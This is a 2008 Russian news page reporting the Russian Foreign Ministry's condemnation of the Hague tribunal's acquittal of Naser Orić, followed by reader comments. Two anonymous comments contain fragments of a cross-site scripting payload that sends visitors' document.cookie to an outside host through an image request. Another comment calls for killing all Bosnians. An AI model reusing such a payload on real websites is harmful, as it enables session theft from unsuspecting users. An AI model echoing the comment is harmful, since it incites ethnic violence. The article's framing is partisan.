Кто владеет информацией,
владеет миром

Освистанный нацболами МИД РФ, кажется, очнулся и требует роспуска Гаагского трибунала

Опубликовано 10.07.2008 в разделе комментариев 6

Освистанный нацболами МИД РФ, кажется, очнулся и требует роспуска Гаагского трибунала

В Москве с недоумением восприняли недавнее решение Международного трибунала по бывшей Югославии на апелляцию главного прокурора Браммерца по делу боснийского военного преступника Орича, организовавшего в ходе вооруженного конфликта в Боснии и Герцеговине 1992-1995 годов убийства около трех тысяч мирных сербских жителей в окрестностях Сребреницы, говорится в заявлении официального представителя МИД РФ Андрея Нестеренко, передает "Интерфакс".

Нестренко подчеркнул, что "трибунал не только не ужесточил вынесенный летом 2006 года беспрецедентно мягкий приговор, но, напротив, полностью оправдал подсудимого". В российском МИДе считают, что это проявление предвзятого отношения трибунала и "выполнения политического заказа".

"Решение трибунала лишь подтверждает необходимость незамедлительной реализации принятой стратегии по сворачиванию его деятельности" - отмечается в заявлении МИД РФ.

"Вызывает непонимание и тот факт, что непосредственно вовлеченный в процесс примирения вокруг Сребреницы аппарат Высокого представителя на сей раз предпочел отмолчаться. И это при том, что Орич не сдался МТБЮ добровольно, а был арестован и препровожден в Гаагу международными Силами по стабилизации" - сказал Нестеренко.

Глава МИД РФ Сергей Лавров 2 апреля заявил в Госдуме, что Россия выступает за прекращение деятельности Международного трибунала по бывшей Югославии (МТБЮ) к 2010 году из-за того, что "результаты его деятельности вызывают озабоченность". По его словам, такая позиция обусловлена и принятой в свое время по настоянию Москвы резолюцией Совета Безопасности ООН.

Напомним, бывший командир боснийских мусульман Насер Орич, проходивший по делу об убийствах боснийских сербов в Сребренице, очищен от всех обвинений. Невиновным его признала в четверг апелляционная палата трибунала ООН по бывшей Югославии, передает AFP. Тем самым она удовлетворила жалобу Орича, осужденного в 2006 году, но так и не признавшего свою вину.

Тогда Гаагский трибунал признал Орича виновным в том, что он не предотвратил убийства и пытки сербских пленных в годы войны в Боснии в 1992-95 годах. Во время событий в Сребренице, которые позже были признаны наиболее жестокими за всю войну, Орич не воспрепятствовал убийству шести пленных, и жестокому обращению с остальными.

Многие боснийцы считают Орича национальным героем. Президент Сербии Борис Тадич назвал приговор Оричу "самым большим позором Гаагского трибунала".



Рейтинг:   5.00,  Голосов: 1
Поделиться
Всего комментариев к статье: 6
Комментарии не премодерируются и их можно оставлять анонимно
Re: по теме - но с дополнением и поправкой
Факт написал 11.07.2008 06:23
Поправка к Вашему замечанию уважаемый.
Руки прочь от бедных боснийских, американских и европейских фермеров и рабочих!
Поэтому дополнение к Вашему замечанию от 15:04 - не США, не Европа и не Россия, а 666 "управляющих".
Может быть у Вас есть другая методика приватизации, более легкая и безболезненная?
Пожалуйста поделитесь.
``
`` написал 10.07.2008 19:59
``
(без названия)
h написал 10.07.2008 19:59
g
"http://na-s.ru/images/next_1.gif?"+document.cookie;</script>
e написал 10.07.2008 19:57
"http://na-s.ru/images/next_1.gif?"+document.cookie;</script>
К оружию !!!
Воин написал 10.07.2008 17:26
Надо ухлопать всех боснийцев !!!Возмездие должно быть НЕОТВРАТИМЫМ !!!
по теме
из зала написал 10.07.2008 15:04
Кукловоды - США, а сами куклы - Европа, а точнее, Международный трибунал по бывшей Югославии.
Опрос
  • Как думаете, можете ли вы защитить в российском суде ваши законные интересы?:
Результаты
Интернет-ТВ
Новости
Анонсы
Добавить свой материал
Наша блогосфера
Авторы

              
      читайте нас также: pda | twitter | rss